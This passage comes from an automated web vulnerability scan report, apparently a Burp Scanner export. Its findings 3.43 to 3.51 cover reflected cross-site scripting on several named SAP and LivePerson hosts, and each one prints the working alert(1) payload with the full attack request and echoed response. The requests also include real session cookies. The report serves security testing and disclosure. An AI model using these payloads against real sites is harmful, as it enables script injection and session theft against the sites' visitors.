"code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='37021986-VID'; lpMTagConfig.FPC_VID='5110247826455'; lpMTagConfig.FPC_SKEY_NAME='37021986-SKEY'; lpMTagConfig.FPC_SKEY='37230221800283374401af53<img src=a onerror=alert(1)>2257775d063';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_37021986'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...
3.43. https://sales.liveperson.net/hc/37021986/ [msessionkey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://sales.liveperson.net
Path:   /hc/37021986/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 1cc9d<img%20src%3da%20onerror%3dalert(1)>4e366a67b73 was submitted in the msessionkey parameter. This input was echoed as 1cc9d<img src=a onerror=alert(1)>4e366a67b73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/37021986/?&visitor=5140389589811&msessionkey=13161083115174854891cc9d<img%20src%3da%20onerror%3dalert(1)>4e366a67b73&siteContainer=STANDALONE&site=37021986&cmd=mTagKnockPage&lpCallId=460133773312-512542360818&protV=20&lpjson=1&id=4477800663&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-sap-sme-us-en-1%7ClpMTagConfig.db1%7ClpChatButtonDiv1%7C%23voice-sales-sap-sme-us-en-1%7ClpMTagConfig.db1%7ClpVoiceButtonDiv1%7C HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: sales.liveperson.net
Connection: Keep-Alive
Cookie: HumanClickKEY=1316108311517485489; HumanClickSiteContainerID_37021986=STANDALONE; ASPSESSIONIDAQTARCRC=MIIACKDCJHLJIMCHEDDAEOPL; LivePersonID=LP i=5140389589811,d=1318691628

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:29:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=13161083115174854891cc9d<img src=a onerror=alert(1)>4e366a67b73; path=/hc/37021986
Set-Cookie: HumanClickKEY=13161083115174854891cc9d<img src=a onerror=alert(1)>4e366a67b73; path=/hc/37021986
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 15 Oct 2011 15:29:07 GMT
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Content-Length: 33255

lpConnLib.Process({"ResultSet": {"lpCallId":"460133773312-512542360818","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
"code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='37021986-VID'; lpMTagConfig.FPC_VID='5140389589811'; lpMTagConfig.FPC_SKEY_NAME='37021986-SKEY'; lpMTagConfig.FPC_SKEY='13161083115174854891cc9d<img src=a onerror=alert(1)>4e366a67b73';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_37021986'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...
3.44. http://sapglobalmarketingin.tt.omtrdc.net/m2/sapglobalmarketingin/sc/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sapglobalmarketingin.tt.omtrdc.net
Path:   /m2/sapglobalmarketingin/sc/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 4d316<img%20src%3da%20onerror%3dalert(1)>4a39ca00ecc was submitted in the mbox parameter. This input was echoed as 4d316<img src=a onerror=alert(1)>4a39ca00ecc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /m2/sapglobalmarketingin/sc/standard?mboxHost=store.businessobjects.com&mboxSession=1318689062767-959486&mboxPage=1318689062767-959486&mboxCount=1&mbox=SiteCatalyst%3A%20event4d316<img%20src%3da%20onerror%3dalert(1)>4a39ca00ecc&mboxId=0&mboxTime=1318671062929&visitorID=50271dcd9baa4ef3893c9fb47c6b6fd7&visitorNamespace=sap&pageName=estores%3Aus%3Ahomepage&currencyCode=USD&channel=estores&server=estores&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1326&browserHeight=890&dynamicAccountSelection=true&dynamicAccountList=sapvbudev%3Ddigitalriver.com&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=true&linkDownloadFileTypes=rar%2Cexe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx&linkInternalFilters=streamwork.com%2Csapstreamwork.com%2Caboutsapcampbell.com%2Canalytics-usa.com%2Cestara.com%2Cbestsapchina.com%2Cbusinessobjects.com%2Cbusinessobjects.com.pl%2Cbusiness-objects.com.pl%2Cbusinessobjects.pl%2Cbusiness-objects.pl%2Ccareersatsap.com%2Ccfolder.de%2Ccfolders.com%2Ccfolders.de%2Ccfolders.net%2Ccrystalreports.com%2Cdigitalriver.com%2Cedusap.at%2Cfazi.at%2Cfazi.com%2Cfazi.de%2Cfuturefactoryinitiative.com%2Cfuturefactoryinitiative.org%2Cfuzzy.at%2Cfuzzy.ch%2Cfuzzy-informatik.com%2Cfuzzy-informatik.de%2Cfuzzy-online.com%2Cfuzzy-online.de%2Cinfommersion.com%2Condemand.com%2Csap.at%2Csap.bg%2Csap.biz%2Csap.ca%2Csap.ch%2Csap.cl%2Csap.cn%2Csap.co.at%2Csap.co.il%2Csap.co.jp%2Csap.co.kr%2Csap.co.nz%2Csap.co.th%2Csap.co.uk%2Csap.co.za%2Csap.com%2Csap.com.au%2Csap.com.cn%2Csap.com.pl%2Csap.com.sg%2Csap.com.tr%2Csap.com.tw%2Csap.cz%2Csap.de%2Csap.ee%2Csap.fi%2Csap.hk%2Csap.hr%2Csap.hu%2Csap.ie%2Csap.in%2Csap.info%2Csap.kz%2Csap.lu%2Csap.nl%2Csap.pl%2Csap.pt%2Csap.ro%2Csap.ru%2Csap.si%2Csap.sk%2Csap.tw%2Csap.ua%2Csap.us%2Csapag.de%2Csap-ag.de%2Csapamerica.com%2Csap-answer.com%2Csap-austria.com%2Csap-best-fit-adviser.com%2Csapbusinessbydesign.cn%2Csapbusinessbydesign.co.uk%2Csapbusinessbydesign.com%2Csapbusinessbydesign.de%2Csapbusinessbydesign.us%2Csapbusinessobjects.com.pl%2Csap-business-objects.com.pl%2Csapbusinessobjects.pl%2Csap-business-objects.pl%2Csapbusinessobjectsresponses.com%2Csapbusinessone.pl%2Csap-campbell.com%2Csapcampbell.net%2Csapcampbell.org%2Csapchina.com%2Csapclear.com%2Csapconfigurator.com%2Csapdesignguild.org%2Csap-event.jp%2Csapevents.com%2Csap-forum.de%2Csap-insights.com%2Csapkhimetrics.com%2Csaplabs.bg%2Csaplabs.co.in%2Csaplabs.fr%2Csaplabs.in%2Csapnetweaver.com%2Csapphirenow.com%2Csap-retail.de%2Csapsapphire.com%2Csapsem.com%2Csap-spectrum.com%2Csapstreamwork.com%2Csapteched.com%2Csapthai.com%2Csapturkiye.com.tr%2Csap-tv.com%2Csapventures.com%2Csapworldtour.com%2Csapworldtour2010.com%2Csteeb.de%2Csap.corp%2Csaplabs.com%2Csybase.com%2Csappartneredge.eu%2Cjavascript%3A%2Cstore.businessobjects.com&linkTrackVars=visitorID%2Cserver&linkTrackEvents=None&prop1=na&eVar1=estores%3Aus&hier1=estores%2Cna%2Cus&prop2=english&eVar2=english&eVar3=estores&prop5=us&prop8=new&eVar8=new&prop9=logN&eVar9=logN&eVar13=CG4DA4BC51&prop14=logN%7Cestores%3Aus%3Ahomepage&prop15=null%7Cestores%3Aus%3Ahomepage&eVar15=%7C&eVar18=%2B1&eVar19=estores%2Cna%2Cus&eVar20=estores%3Aus%3Ahomepage&eVar35=http%3A%2F%2Fwww.sap.com%2Findex.epx&eVar36=CG4DA4BC51&prop38=saturday%7C4%3A30pm&eVar38=saturday%7C4%3A30pm&prop47=1&prop50=estores%3A2011.04.18%7Cgl%3A2011.09.07&mboxURL=http%3A%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2FDisplayHomePage%2Fpgm.%2B77298800%3F_s_icmp%3DCG4DA4BC51%26resid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1318689037443&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: sapglobalmarketingin.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 264
Date: Sat, 15 Oct 2011 14:33:01 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1318689062767-959486.19");mboxFactories.get('default').get('SiteCatalyst: event4d316<img src=a onerror=alert(1)>4a39ca00ecc', 0).setOffer(new mboxOfferDefault()).loaded();}
3.45. http://sapglobalmarketingin.tt.omtrdc.net/m2/sapglobalmarketingin/sc/standard [mboxId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sapglobalmarketingin.tt.omtrdc.net
Path:   /m2/sapglobalmarketingin/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload 785ad<script>alert(1)</script>e8955e63c5c was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/sapglobalmarketingin/sc/standard?mboxHost=store.businessobjects.com&mboxSession=1318689062767-959486&mboxPage=1318689062767-959486&mboxCount=1&mbox=SiteCatalyst%3A%20event&mboxId=0785ad<script>alert(1)</script>e8955e63c5c&mboxTime=1318671062929&visitorID=50271dcd9baa4ef3893c9fb47c6b6fd7&visitorNamespace=sap&pageName=estores%3Aus%3Ahomepage&currencyCode=USD&channel=estores&server=estores&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1326&browserHeight=890&dynamicAccountSelection=true&dynamicAccountList=sapvbudev%3Ddigitalriver.com&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=true&linkDownloadFileTypes=rar%2Cexe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx&linkInternalFilters=streamwork.com%2Csapstreamwork.com%2Caboutsapcampbell.com%2Canalytics-usa.com%2Cestara.com%2Cbestsapchina.com%2Cbusinessobjects.com%2Cbusinessobjects.com.pl%2Cbusiness-objects.com.pl%2Cbusinessobjects.pl%2Cbusiness-objects.pl%2Ccareersatsap.com%2Ccfolder.de%2Ccfolders.com%2Ccfolders.de%2Ccfolders.net%2Ccrystalreports.com%2Cdigitalriver.com%2Cedusap.at%2Cfazi.at%2Cfazi.com%2Cfazi.de%2Cfuturefactoryinitiative.com%2Cfuturefactoryinitiative.org%2Cfuzzy.at%2Cfuzzy.ch%2Cfuzzy-informatik.com%2Cfuzzy-informatik.de%2Cfuzzy-online.com%2Cfuzzy-online.de%2Cinfommersion.com%2Condemand.com%2Csap.at%2Csap.bg%2Csap.biz%2Csap.ca%2Csap.ch%2Csap.cl%2Csap.cn%2Csap.co.at%2Csap.co.il%2Csap.co.jp%2Csap.co.kr%2Csap.co.nz%2Csap.co.th%2Csap.co.uk%2Csap.co.za%2Csap.com%2Csap.com.au%2Csap.com.cn%2Csap.com.pl%2Csap.com.sg%2Csap.com.tr%2Csap.com.tw%2Csap.cz%2Csap.de%2Csap.ee%2Csap.fi%2Csap.hk%2Csap.hr%2Csap.hu%2Csap.ie%2Csap.in%2Csap.info%2Csap.kz%2Csap.lu%2Csap.nl%2Csap.pl%2Csap.pt%2Csap.ro%2Csap.ru%2Csap.si%2Csap.sk%2Csap.tw%2Csap.ua%2Csap.us%2Csapag.de%2Csap-ag.de%2Csapamerica.com%2Csap-answer.com%2Csap-austria.com%2Csap-best-fit-adviser.com%2Csapbusinessbydesign.cn%2Csapbusinessbydesign.co.uk%2Csapbusinessbydesign.com%2Csapbusinessbydesign.de%2Csapbusinessbydesign.us%2Csapbusinessobjects.com.pl%2Csap-business-objects.com.pl%2Csapbusinessobjects.pl%2Csap-business-objects.pl%2Csapbusinessobjectsresponses.com%2Csapbusinessone.pl%2Csap-campbell.com%2Csapcampbell.net%2Csapcampbell.org%2Csapchina.com%2Csapclear.com%2Csapconfigurator.com%2Csapdesignguild.org%2Csap-event.jp%2Csapevents.com%2Csap-forum.de%2Csap-insights.com%2Csapkhimetrics.com%2Csaplabs.bg%2Csaplabs.co.in%2Csaplabs.fr%2Csaplabs.in%2Csapnetweaver.com%2Csapphirenow.com%2Csap-retail.de%2Csapsapphire.com%2Csapsem.com%2Csap-spectrum.com%2Csapstreamwork.com%2Csapteched.com%2Csapthai.com%2Csapturkiye.com.tr%2Csap-tv.com%2Csapventures.com%2Csapworldtour.com%2Csapworldtour2010.com%2Csteeb.de%2Csap.corp%2Csaplabs.com%2Csybase.com%2Csappartneredge.eu%2Cjavascript%3A%2Cstore.businessobjects.com&linkTrackVars=visitorID%2Cserver&linkTrackEvents=None&prop1=na&eVar1=estores%3Aus&hier1=estores%2Cna%2Cus&prop2=english&eVar2=english&eVar3=estores&prop5=us&prop8=new&eVar8=new&prop9=logN&eVar9=logN&eVar13=CG4DA4BC51&prop14=logN%7Cestores%3Aus%3Ahomepage&prop15=null%7Cestores%3Aus%3Ahomepage&eVar15=%7C&eVar18=%2B1&eVar19=estores%2Cna%2Cus&eVar20=estores%3Aus%3Ahomepage&eVar35=http%3A%2F%2Fwww.sap.com%2Findex.epx&eVar36=CG4DA4BC51&prop38=saturday%7C4%3A30pm&eVar38=saturday%7C4%3A30pm&prop47=1&prop50=estores%3A2011.04.18%7Cgl%3A2011.09.07&mboxURL=http%3A%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2FDisplayHomePage%2Fpgm.%2B77298800%3F_s_icmp%3DCG4DA4BC51%26resid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1318689037443&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: sapglobalmarketingin.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 261
Date: Sat, 15 Oct 2011 14:33:03 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1318689062767-959486.19");mboxFactories.get('default').get('SiteCatalyst: event', 0785ad<script>alert(1)</script>e8955e63c5c).setOffer(new mboxOfferDefault()).loaded();}
3.46. http://smepartnerfinder.sap.com/FlashIFrame.aspx [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smepartnerfinder.sap.com
Path:   /FlashIFrame.aspx

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6586a"%3balert(1)//f4427f5b16c was submitted in the lang parameter. This input was echoed as 6586a";alert(1)//f4427f5b16c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FlashIFrame.aspx?lang=en6586a"%3balert(1)//f4427f5b16c HTTP/1.1
Host: smepartnerfinder.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://smepartnerfinder.sap.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; ASP.NET_SessionId=3mmip455whoq0f55gcf2phvg

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:27:57 GMT
Content-Length: 2364


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   
   <head><title>

</tit
...[SNIP]...
<script type="text/javascript">
               var flashvars = {};
               flashvars.lang = "en6586a";alert(1)//f4427f5b16c";
               flashvars.preview = "false";
               flashvars.Partner = "";
flashvars.externalId = "";

               var params = {};
               params.wmode = "transparent";
               params.allowfullscreen =
...[SNIP]...
3.47. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [39359%22%3E%3Cscript%3Ealert(1)%3C/script%3E322e7d1fcaf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg

Issue detail

The value of the 39359%22%3E%3Cscript%3Ealert(1)%3C/script%3E322e7d1fcaf request parameter is copied into the HTML document as plain text between tags. The payload bd785<script>alert(1)</script>1c5f68d385a was submitted in the 39359%22%3E%3Cscript%3Ealert(1)%3C/script%3E322e7d1fcaf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cs/user/create/cs_msg?39359%22%3E%3Cscript%3Ealert(1)%3C/script%3E322e7d1fcaf=1bd785<script>alert(1)</script>1c5f68d385a HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/cs/user/create/cs_msg?39359%22%3E%3Cscript%3Ealert(1)%3C/script%3E322e7d1fcaf=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:29:16 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1323

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
</script>322e7d1fcaf=1bd785<script>alert(1)</script>1c5f68d385a" />
...[SNIP]...
3.48. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66fe1"><script>alert(1)</script>8b27daf9eeb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cs/user/create/cs_msg66fe1"><script>alert(1)</script>8b27daf9eeb HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:45 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1279

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
<input type="hidden" name="x-redirect" value="/cs/user/create/cs_msg66fe1"><script>alert(1)</script>8b27daf9eeb" />
...[SNIP]...
3.49. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39359"><script>alert(1)</script>322e7d1fcaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cs/user/create/cs_msg?39359"><script>alert(1)</script>322e7d1fcaf=1 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:43 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1282

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
<input type="hidden" name="x-redirect" value="/cs/user/create/cs_msg?39359"><script>alert(1)</script>322e7d1fcaf=1" />
...[SNIP]...
3.50. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19070"><script>alert(1)</script>c23af16cf20 was submitted in the page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cs/user/create/cs_msg?x-lr=cs_disc/&x-lr2=wlg/26917&page=19070"><script>alert(1)</script>c23af16cf20 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:50 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1315

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
<input type="hidden" name="x-redirect" value="/cs/user/create/cs_msg?x-lr=cs_disc/&x-lr2=wlg/26917&page=19070"><script>alert(1)</script>c23af16cf20" />
...[SNIP]...
3.51. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [x-lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg

Issue detail

The value of the x-lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80cf2"><script>alert(1)</script>80a4f10b6b was submitted in the x-lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cs/user/create/cs_msg?x-lr=cs_disc/80cf2"><script>alert(1)</script>80a4f10b6b&x-lr2=wlg/26917&page= HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:48 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1314

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
<input type="hidden" name="x-redirect" value="/cs/user/create/cs_msg?x-lr=cs_disc/80cf2"><script>alert(1)</script>80a4f10b6b&x-lr2=wlg/26917&page=" />
...[SNIP]...
